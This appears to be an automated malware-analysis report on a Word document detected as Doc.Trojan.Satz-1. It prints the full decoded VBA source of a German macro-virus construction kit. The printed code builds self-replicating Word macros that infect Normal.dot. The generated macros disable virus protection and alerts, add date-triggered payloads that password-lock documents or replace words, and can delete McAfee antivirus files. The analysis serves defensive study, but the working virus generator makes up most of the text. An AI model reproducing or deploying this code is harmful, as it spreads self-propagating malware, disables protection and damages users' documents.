MALICIOUS
208
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Word document containing a legacy WordBasic auto-exec macro named 'autoopen'. The VBA code within 'macros.bas' also defines an 'autoopen' subroutine that attempts to minimize the application and show a userform named 'prog'. The script also contains obfuscated code that appears to be part of a macro virus kit, attempting to disable security features and potentially download additional content. The presence of the 'autoopen' macro and the nature of the VBA code strongly suggest a malicious intent to execute further stages.
Heuristics 5
-
ClamAV: Doc.Trojan.Satz-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Satz-1
-
NOP sled detected high SC_NOP_SLEDFound 20+ consecutive 0x90 bytes
Disassembly
Attempted x86 opcode disassembly00029405 90 nop 00029406 90 nop 00029407 90 nop 00029408 90 nop 00029409 90 nop 0002940A 90 nop 0002940B 90 nop 0002940C 90 nop 0002940D 90 nop 0002940E 90 nop 0002940F 90 nop 00029410 90 nop 00029411 90 nop 00029412 90 nop 00029413 90 nop 00029414 90 nop 00029415 90 nop 00029416 90 nop 00029417 90 nop 00029418 90 nop 00029419 90 nop 0002941A 90 nop 0002941B 90 nop 0002941C 90 nop 0002941D 90 nop 0002941E 90 nop 0002941F 90 nop 00029420 9f lahf 00029421 9f lahf 00029422 9f lahf 00029423 9f lahf 00029424 9f lahf 00029425 9f lahf 00029426 a0a0a0a0a0 mov al, byte ptr [0xa0a0a0a0] 0002942B a0a0a0a0a0 mov al, byte ptr [0xa0a0a0a0] 00029430 a0a0afafaf mov al, byte ptr [0xafafafa0] 00029435 af scasd eax, dword ptr es:[edi] 00029436 af scasd eax, dword ptr es:[edi] 00029437 af scasd eax, dword ptr es:[edi] 00029438 b0b0 mov al, 0xb0 0002943A b0af mov al, 0xaf 0002943C af scasd eax, dword ptr es:[edi] 0002943D af scasd eax, dword ptr es:[edi] 0002943E 9f lahf 0002943F 9f lahf 00029440 9f lahf 00029441 af scasd eax, dword ptr es:[edi] 00029442 af scasd eax, dword ptr es:[edi] 00029443 af scasd eax, dword ptr es:[edi] 00029444 9f lahf 00029445 9f lahf 00029446 9f lahf 00029447 90 nop 00029448 90 nop 00029449 90 nop 0002944A 7f7f jg 0x294cb 0002944C 7fcf jg 0x2941d 0002944E cf iretd 0002944F cf iretd 00029450 df .byte 0xdf 00029451 df .byte 0xdf 00029452 dfe0 fnstsw ax 00029454 ef out dx, eax 00029455 ef out dx, eax 00029456 ef out dx, eax 00029457 f0 .byte 0xf0 00029458 f0 .byte 0xf0 00029459 f0 .byte 0xf0 0002945A ff .byte 0xff 0002945B ff .byte 0xff 0002945C ef out dx, eax 0002945D ef out dx, eax 0002945E ef out dx, eax 0002945F ff .byte 0xff 00029460 ff .byte 0xff 00029461 fff0 push eax 00029463 f0 .byte 0xf0 00029464 f0 .byte 0xf0
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "VirusBausatz" Sub autoopen() Application.WindowState = wdWindowStateMinimize
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6678 bytes |
SHA-256: 9643f3bc74c4dcf8fb58f5bfbe6b40b19ce8ddb3d0fa62305d0ef37c53ca7e3c |
|||
|
Detection
ClamAV:
Doc.Trojan.Satz-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VirusBausatz"
Sub autoopen()
Application.WindowState = wdWindowStateMinimize
prog.Show
End Sub
Attribute VB_Name = "prog"
Attribute VB_Base = "0{BA2AE9D2-2112-11D5-AEE1-DC167E47EF7A}{BA2AE9C3-2112-11D5-AEE1-DC167E47EF7A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub boxzeigen_Click()
End Sub
Private Sub CheckBox3_Click()
End Sub
Private Sub CommandButton1_Click()
Hilfe.Show
End Sub
Private Sub create_Click()
Documents.Add
Set Target = ActiveDocument.VBProject.VBComponents(1).CodeModule
ende = "end if"
anzeichen = "'"
offnen = "sub autoopen()"
schliessen = "sub autoexit()"
speichern = "ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, fileformat:=wdFormatDocument"
vcode = "on error resume next" & Chr(10) _
& "'Made with the W97 MakroVirus Bausatz by MagBee" & Chr(10) & "ActiveDocument.ReadOnlyRecommended = False" & Chr(10) & "Options.VirusProtection = False" & Chr(10) _
& "Options.SaveNormalPrompt = False" & Chr(10) & "Application.DisplayAlerts = wdAlertsNone" & Chr(10) & "Application.EnableCancelKey = wdCancelDisabled" & Chr(10) _
& "Application.DisplayStatusBar = False" & Chr(10) & "Options.ConfirmConversions = False" & Chr(10) & "Application.ScreenUpdating = False" & Chr(10) & "If ThisDocument.Name =" & Chr$(34) & "Normal.dot" & Chr$(34) & "Then" & Chr(10) _
& "Set Source = NormalTemplate.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "Set Target = ActiveDocument.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "else" & Chr(10) & "Set Source = ActiveDocument.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& Chr(10) & "Set Target = NormalTemplate.VBProject.VBComponents(1).CodeModule" & Chr(10) _
& "End If" & Chr(10) & "With Source" & Chr(10) & "vircode = .lines(1, .countoflines)" _
& Chr(10) & "End With" & Chr(10) & "With Target" & Chr(10) & ".deletelines 1, .countoflines" _
& Chr(10) & ".insertlines 1, vircode" & Chr(10) & "End With" & Chr(10) & Chr(10) & Chr(10) & Chr(10) _
& Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) _
& Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & Chr(10) & "end sub" _
If OptionButton1.Value = True Then
With Target
.insertlines 1, offnen
End With
End If
If OptionButton2.Value = True Then
With Target
.insertlines 1, schliessen
End With
End If
With Target
.insertlines 2, vcode
End With
With Target
.insertlines 42, speichern
End With
If boxzeigen.Value = True Then
nachricht = InputBox("Gebt hier die Nachricht ein, die in der Messagebox stehen soll", "Nachricht in der Messagebox")
trigger = "if day(now()) = " & Label1 & " and month(now()) = " & Label3 & " then"
mbox = "Msgbox " & Chr$(34) & nachricht & Chr$(34) & ", ," & Chr$(34) & "W97M Virus Bausatz by MagBee" & Chr$(34)
If CheckBox3.Value = True Then
With Target
.insertlines 31, mbox
End With
GoTo weiterpw
End If
With Target
.insertlines 30, trigger
.insertlines 31, mbox
.insertlines 32, ende
End With
End If
weiterpw:
If passwort.Value = True Then
pawo = InputBox("Wie soll das Passwort lauten (keine Leerzeichen)", "Passwortvergabe")
triggerpw = "if day(now()) = " & Label4 & " and month(now()) = " & Label6 & " then"
pw = "If ActiveDocument.HasPassword = False Then ActiveDocument.Password = " & Chr$(34) & pawo & Chr$(34)
If CheckBox6.Value = True Then
With Target
.insertlines 35, pw
End With
GoTo weiterers
End If
With Target
.insertlines 34, triggerpw
.insertlines 35, pw
.insertlines 36, ende
End With
End If
weiterers:
If CheckBox2.Value = True Then
wzuersetz = InputBox("Welches Wort soll ersetzt werden", "Wort ersetzen")
ersetzwort = InputBox("Durch welches Wort soll es ersetzt werden", "Wort ersetzen")
ersetzen = "Selection.Find.ClearFormatting" & Chr(10) & "Selection.Find.Replacement.ClearFormatting" _
& Chr(10) & "With Selection.Find" & Chr(10) & ".Text = " & Chr$(34) & wzuersetz & Chr$(34) & Chr(10) & ".Replacement.Text = " _
& Chr$(34) & ersetzwort & Chr$(34) & Chr(10) & ".Forward = True" & Chr(10) & ".Wrap = wdFindContinue" & Chr(10) & "End With" _
& Chr(10) & "Selection.Find.Execute Replace:=wdReplaceAll"
triggerers = "if day(now()) = " & Label5 & " and month(now()) = " & Label9 & " then"
If CheckBox7.Value = True Then
With Target
.insertlines 39, ersetzen
End With
GoTo weiter
End If
With Target
.insertlines 38, triggerers
.insertlines 39, ersetzen
.insertlines 40, ende
End With
End If
weiter:
If OptionButton3.Value = True Then
killja = "Kill (" & Chr$(34) & "c:\Programme\Mcafee\VirusScan\*.*" & Chr$(34) & ")"
With Target
.insertlines 28, killja
End With
End If
vname = InputBox("Wie soll der Virus heißen ?", "creation", "VirusName")
ActiveDocument.SaveAs FileName:=vname, FileFormat:=wdFormatDocument
MsgBox "Dein Virus wurde unter Eigene Dateien gespeichert", , "W97M Bausatz by MagBee" & Chr$(34)
End Sub
Private Sub payload_Click()
End Sub
Private Sub OptionButton1_Click()
End Sub
Private Sub OptionButton2_Click()
MsgBox "Wichtig bei Autoexit zuerst den Virus schließen (Aktives Fenster in Word)" & Chr(10) & "und dann Word beenden !", , "W97M Virus Bausatz by MagBee"
End Sub
Private Sub OptionButton4_Click()
End Sub
Private Sub passwort_Click()
End Sub
Private Sub ScrollBar1_Change()
Label1.Caption = ScrollBar1.Value
End Sub
Private Sub ScrollBar2_Change()
Label3.Caption = ScrollBar2.Value
End Sub
Private Sub ScrollBar3_Change()
Label4.Caption = ScrollBar3.Value
End Sub
Private Sub ScrollBar4_Change()
Label5.Caption = ScrollBar4.Value
End Sub
Private Sub ScrollBar5_Change()
Label6.Caption = ScrollBar5.Value
End Sub
Private Sub ScrollBar6_Change()
Label9.Caption = ScrollBar6.Value
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "Hilfe"
Attribute VB_Base = "0{BA2AE9CE-2112-11D5-AEE1-DC167E47EF7A}{BA2AE9C5-2112-11D5-AEE1-DC167E47EF7A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.